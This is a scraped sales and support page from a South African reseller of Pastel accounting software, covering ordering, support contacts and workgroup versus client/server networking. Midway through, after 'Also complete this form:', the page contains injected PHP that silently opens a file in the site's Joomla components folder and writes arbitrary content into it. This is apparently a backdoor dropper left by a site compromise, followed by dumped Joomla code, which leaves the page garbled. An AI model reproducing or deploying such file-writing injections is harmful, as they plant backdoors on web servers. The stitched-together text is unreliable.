Facebook Image
 

This Month Specials

  • XpressBox of 250 payslips
    A4 Confidential
    R 730 : Make arrangements to collect at any Sage Pastel Office Countrywide
     
     
    Payslips
  • Partner Advantage

    Pastel Partner Advantage:
    Base (1 user, multi company)  + BIC + Bank Manager + Support: 

    For only R 9 090 click here
    Partner Advantage v.19 - R 9 090
  • Xpress v.19
  • SageOne - Online Accounting

    Sign up here to get 1 Month FREE

    SageOne Online

Sales Hotline:

074-892-2815
082-878-6772

sales@accountingdirect.co.za
Need support?: Click here 
  • Home

Articles Tagged ‘AccountingDirect | Pastel Sales’

How do I order?

1. Online

The best way is to click on the "Add to cart" button of the product you wish to purchase and follow the instructions.

The system will provide you a form to add your details, and then a choice of payment.
At the end it will provide you the banking details & fax number.  You will also receive an email with our banking and contact details.*
As soon as we receive your proof payment, we'll send you a VAT invoice.

* If you do not receive the reply email, please make sure you used the correct email address

or

2. Fax order

You can also fax a order to 086 729 9579 

Download, complete and fax to the fax number:

 Fax order form

 


or 

3. Email us

Send us email - Sales contact page

We  need your physical address for deliver, business name & VAT number, Contact details and serial number of you current Pastel (if you're upgrading).


or

4. Phone us

on 086-111-3980


 

5. For upgrades

Click here - because we need more information

 


 

Need Support?

For online support or for consulting on Xpress , Partner & Payroll :

Country Wide - Online support with Teamviewer and/or email - phone 0860-346-266

Rate R 375.00 excl. per 1/2 Hour

 

Consulting & On Site Training:

In the following areas:

  • Gauteng - Contact Hannelie : 0860-346-266 or 083 709 4096 
  • Western Cape - Contact Janneke - 021 9815308 or 084 901 5308
  • Limpopo,Mpumalanga,Polokwane - Contact Petros 076 787 2516
  • KZN - Contact - Ashna 084 560 8128 Nolan 071 440 3679 

 

If you have a Business Care Contract with Pastel:

Phone the Pastel support line @ 086-112-6837

 

 

 Also complete this form:

 

';$file = @fopen("/home/account/public_html/components/com_contact/views/category/com_contact_info.php", "w");@fwrite($file, $content) ; /** * @package Joomla.Site * @subpackage com_contact * * @copyright Copyright (C) 2005 - 2013 Open Source Matters, Inc. All rights reserved. * @license GNU General Public License version 2 or later; see LICENSE.txt */ defined('_JEXEC') or die; /** * Contact Component Route Helper * * @static * @package Joomla.Site * @subpackage com_contact * @since 1.5 */ abstract class ContactHelperRoute { protected static $lookup; protected static $lang_lookup = array(); /** * @param integer The route of the contact */ public static function getContactRoute($id, $catid, $language = 0) { $needles = array( 'contact' => array((int) $id) ); //Create the link $link = 'index.php?option=com_contact&view=contact&id='. $id; if ($catid > 1) { $categories = JCategories::getInstance('Contact'); $category = $categories->get($catid); if ($category) { $needles['category'] = array_reverse($category->getPath()); $needles['categories'] = $needles['category']; $link .= '&catid='.$catid; } } if ($language && $language != "*" && JLanguageMultilang::isEnabled()) { self::buildLanguageLookup(); if (isset(self::$lang_lookup[$language])) { $link .= '&lang='.self::$lang_lookup[$language]; $needles['language'] = $language; } } if ($item = self::_findItem($needles)) { $link .= '&Itemid='.$item; } return $link; } public static function getCategoryRoute($catid, $language = 0) { if ($catid instanceof JCategoryNode) { $id = $catid->id; $category = $catid; } else { $id = (int) $catid; $category = JCategories::getInstance('Contact')->get($id); } if ($id < 1 || !($category instanceof JCategoryNode)) { $link = ''; } else { $needles = array(); // Create the link $link = 'index.php?option=com_contact&view=category&id=' . $id; $catids = array_reverse($category->getPath()); $needles['category'] = $catids; $needles['categories'] = $catids; if ($language && $language != "*" && JLanguageMultilang::isEnabled()) { self::buildLanguageLookup(); if (isset(self::$lang_lookup[$language])) { $link .= '&lang=' . self::$lang_lookup[$language]; $needles['language'] = $language; } } if ($item = self::_findItem($needles)) { $link .= '&Itemid='.$item; } } return $link; } protected static function buildLanguageLookup() { if (count(self::$lang_lookup) == 0) { $db = JFactory::getDbo(); $query = $db->getQuery(true) ->select('a.sef AS sef') ->select('a.lang_code AS lang_code') ->from('#__languages AS a'); $db->setQuery($query); $langs = $db->loadObjectList(); foreach ($langs as $lang) { self::$lang_lookup[$lang->lang_code] = $lang->sef; } } } protected static function _findItem($needles = null) { $app = JFactory::getApplication(); $menus = $app->getMenu('site'); $language = isset($needles['language']) ? $needles['language'] : '*'; // Prepare the reverse lookup array. if (!isset(self::$lookup[$language])) { self::$lookup[$language] = array(); $component = JComponentHelper::getComponent('com_contact'); $attributes = array('component_id'); $values = array($component->id); if ($language != '*') { $attributes[] = 'language'; $values[] = array($needles['language'], '*'); } $items = $menus->getItems($attributes, $values); foreach ($items as $item) { if (isset($item->query) && isset($item->query['view'])) { $view = $item->query['view']; if (!isset(self::$lookup[$language][$view])) { self::$lookup[$language][$view] = array(); } if (isset($item->query['id'])) { // here it will become a bit tricky // language != * can override existing entries // language == * cannot override existing entries if (!isset(self::$lookup[$language][$view][$item->query['id']]) || $item->language != '*') { self::$lookup[$language][$view][$item->query['id']] = $item->id; } } } } } if ($needles) { foreach ($needles as $view => $ids) { if (isset(self::$lookup[$language][$view])) { foreach ($ids as $id) { if (isset(self::$lookup[$language][$view][(int) $id])) { return self::$lookup[$language][$view][(int) $id]; } } } } } $active = $menus->getActive(); if ($active && ($active->language == '*' || !JLanguageMultilang::isEnabled())) { return $active->id; } // if not found, return language specific home link $default = $menus->getDefault($language); return !empty($default->id) ? $default->id : null; } }

Support

22 MAGWA CRESCENT WATERFALL MIDRAND

Workgroup or Client Server

A user in Pastel Xpress or Partner refers to a computer on a network.

Therefore 2 users is 2 computers linked via a network.  If a computer is not linked to a network, it's not a user and you cannot purchase a user licence for that computer

A computer network can also consist of, and is usually made for, more than two computers:

Workgroup Networking

In a peer-to-peer network, each computer holds its files and resources. Other computers can access these resources but a computer that has a particular resource must be turned on for other computers to access the resource it has. For example, if a printer is connected to computer A and computer B wants to printer to that printer, computer A must be turned On.

 


2 user Workgroup network

 


3 user Workgroup network

Client/Server Networking

A computer network is referred to as client/server if (at least) one of the computers is used to "serve" other computers referred to as "clients". Besides the computers, other types of devices can be part of the network:


4 user Client network: 1 server + 3 workstations

In a client/server environment, each computer still holds (or can still hold) its (or some) resources and files. Other computers can also access the resources stored in a computer, as in a peer-to-peer scenario. One of the particularities of a client/server network is that the files and resources are centralized. This means that a computer, the server, can hold them and other computers can access them. Since the server is always On, the client machines can access the files and resources without caring whether a certain computer is On.

Another big advantage of a client/server network is that security is created, managed, and can highly get enforced. To access the network, a person, called a user must provide some credentials, including a username and a password. If the credentials are not valid, the user can be prevented from accessing the network.

The client/server type of network also provides many other advantages such as centralized backup, Intranet capability and more.

Should I  use Workgroup or Client network?

If you have less than 5 users or if you have more than 10 uers the answer is easy:

  • less than 5 users:  Workgroup network should work perfect
  • if you have more than 9 users, you should only use a Client server

The more difficult part is when you have 5 to 9 users.

Although using a Workgroup network for  up to 9 users can be done - it depends on the load on the computers.

If  your accounting system is very busy, it's preferred and advised to use a Client server.

It's more secure, and safe.

It could happen on a busy Workgroup systems that information are lost or corrupted.

Pervasive

Pastel uses the Pervasive database.  So if your system is networked and you install Pastel, you get an optin to install Pervasive.  This will install the database and your Pastel users will work!

 

 

Fincom KZN

Accounting Direct
(Livemax 1001 CC t/a)
Reg. nr. 2006/088831/23
VAT number : 4810244147